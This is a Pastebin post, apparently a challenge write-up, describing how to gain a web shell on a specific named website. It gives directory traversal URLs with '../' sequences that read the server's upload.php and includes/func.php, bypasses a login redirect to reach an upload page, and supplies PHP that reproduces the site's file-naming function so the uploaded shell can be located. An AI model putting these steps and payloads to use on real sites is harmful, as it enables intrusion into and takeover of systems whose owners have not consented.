Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- So the challenge was to shell the site..
- It was vulnerable to Directory Traversal, some people thought it's LFI, and were trying methods including php wrapper and stuff like that so anyways..
- Here occurs the vulnerabilty ~ http://www.vepr.info/zobraz_pohadku.php?pohadka=baron.txt
- Here's the full path ~ http://prntscr.com/86fm87
- After crawlin through the site we see there's a /upload.php, but if we go there we get redirected to "http://www.vepr.info/login.php?act=2&reason=99"
- but that's not a big deal we can easily bypass that by using NoRedirect, Let's read the file first..
- http://www.vepr.info/zobraz_pohadku.php?pohadka=../../../../../../../../../../d1/www/domain/vepr.info/www/upload.php ~ http://prntscr.com/86fnk3
- by reading upload.php we see there's a require() to get dem functions, so let's read 'includes/func.php'
- http://www.vepr.info/zobraz_pohadku.php?pohadka=../../../../../../../../../../d1/www/domain/vepr.info/www/includes/func.php ~ http://prntscr.com/86fpby
- by reading this we see that it takes a 'name' (your file name) and does some 'leety stuff' with it and returns it *adds sorta timestamp*..
- so we just have to use that function like this, http://prntscr.com/86fwcz ~ save this somewhere and we'll use it later..
- ----
- <?php
- function dwn_name($name){
- $oldname=basename($name);
- $i=0;
- while((substr($oldname,-$i-1,1)!=".")&&($i<strlen($oldname)))
- $i++;
- $ext=substr($oldname,-$i,$i);
- $base=substr($oldname,0,strlen($oldname)-$i-1);
- return $base."_[".substr(time(),1,7)."].".$ext;
- }
- $x = $_REQUEST['shell'];
- echo dwn_name($x);
- ?>
- ----
- let's go to upload.php but before that we'll add /login.php in NoRedirect's 'filter-list' ~ http://prntscr.com/86fss8
- okay let's go ~ http://prntscr.com/86fxmz as soon as you get this message http://prntscr.com/86fwu3
- remember the php i told you to save? run it, and you'll get something like this. http://prntscr.com/86fx3t
- Ta-Da! ~ http://prntscr.com/86fx9k
- pl0x forgive me if there's any mistake ,_, dunt make fon of meh or i'll crie, i'll crie hurd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement